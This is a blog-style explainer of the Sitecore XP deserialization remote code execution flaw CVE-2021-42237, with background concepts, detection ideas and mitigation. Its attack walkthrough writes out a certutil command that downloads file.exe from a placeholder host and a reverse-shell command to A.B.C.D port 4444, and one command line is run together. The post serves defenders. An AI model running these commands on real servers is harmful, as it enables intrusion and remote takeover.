paint-brush
An Intro to Sitecore XP Deserialization RCE (CVE-2021–42237) in 2022by@kaiiyer
672 reads
672 reads

An Intro to Sitecore XP Deserialization RCE (CVE-2021–42237) in 2022

by Kai IyerApril 15th, 2022
Read on Terminal Reader
Read this story w/o Javascript
tldt arrow

Too Long; Didn't Read

Sitecore XP is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. The vulnerability occurs when untrusted data is used to abuse the logic of an application, inflict a denial of service (DoS) attack, or even execute arbitrary code upon it being deserialized. No authentication or special configuration is required to exploit this vulnerability. The recommended solution is to upgrade to a secure version, ideally a higher version, or higher. The flaw can be mitigated by deleting the.ashx file from “sitecore” on all instances.

Companies Mentioned

Mention Thumbnail
Mention Thumbnail
featured image - An Intro to Sitecore XP Deserialization RCE (CVE-2021–42237) in 2022
Kai Iyer HackerNoon profile picture

Sitecore’s Experience Platform (XP) is a .NET enterprise content management system (CMS). Sitecore XP provides you with tools for content management, digital marketing, and analyzing and reporting.

CVE-2021–42237

Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.

Key Concepts before getting started

Insecure Deserialization

Serialization is the conversion of an object into a static stream of bytes, which can be saved to a database or transfer over a network. Deserialization is the reverse of that process, reconstructing a data structure or object from a series of bytes.

The vulnerability occurs when untrusted data is used to abuse the logic of an application, inflict a denial of service (DoS) attack, or even execute arbitrary code upon it being deserialized.
When user-controllable data is deserialized by a website, this potentially enables an attacker to manipulate serialized objects to pass harmful data into the application code.

Web Shell

A web shell is typically a small piece of malicious code written in typical web development programming languages (e.g., ASP, PHP, JSP) that attackers implant on web servers to provide remote access and code execution to server functions.

IIS instance (w3wp.exe) running suspicious processes such as ‘cmd.exe /c echo’, ‘certutil.exe’, or ‘powershell.exe’ that result in the creation of script files in web-accessible folders is a rare event and is typically a strong sign of web shell activity.

Burp Collaborator

A network service that Burp Suite uses to help discover many kinds of vulnerabilities.


The Collaborator client can be used to generate payloads for use in manual testing, and poll the Collaborator server for any network interactions that result from using those payloads.

CertUtil

A Windows binary used for handling certificates.

The intended usage of certutil is to Dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components and verify certificates, key pairs, or certificate chains. But, it is possible to use the tool by attackers to fetch data from the Internet using a URL schema (ftp://, http://, etc).

How a typical attack would look like?

  • Sitecore XP uses insecure deserialization in Report.ashx file which can be leveraged by an attacker to execute arbitrary code on the system
    1. Scanning attempts on the vulnerable server
      URI: “/sitecore/shell/ClientBin/Reporting/Report.ashx”

    2. nslookup from the endpoint towards burpcollaborator domain
      nslookup 5ouceXYZQtem.burpcollaborator.net

    3. Payload download
      “C:\Windows\System32\cmd.exe” /c certutil -urlcache -f https://5ouceXYZQtem.burpcollaborator.netcertutil -f -urlcache

      http://A.B.C.D:8000/file.exe C:\Windows\Temp\file.exe

    4. Reverse shell
      C:\Windows\Temp\file.exe A.B.C.D 4444 -e cmd

    By successfully exploiting this vulnerability, an attacker can gain arbitrary code execution as the user who is running the IIS instance. The attacker can then use "getsystem" command to use RPCSS impersonation and get SYSTEM level code execution.

    Ideas for Detection

  • Suspicious usage of certutil
    Identify certutil.exe making a network connection. Adversaries could abuse certutil.exe to download a certificate, or malware, from a remote URL. Link for Sigma rule.
  • Suspicious nslookup traffic
    nslookup.exe execution and query towards *.burpcollaborator.net domain
  • Mitigation

    The recommended solution is to upgrade to a secure version ideally Sitecore XP 9.0 or higher.. Alternatively the flaw can be mitigated by deleting the Report.ashx file from
    "/sitecore/shell/ClientBin/Reporting/Report.ashx" on all server instances.

    Reference

    Also published here.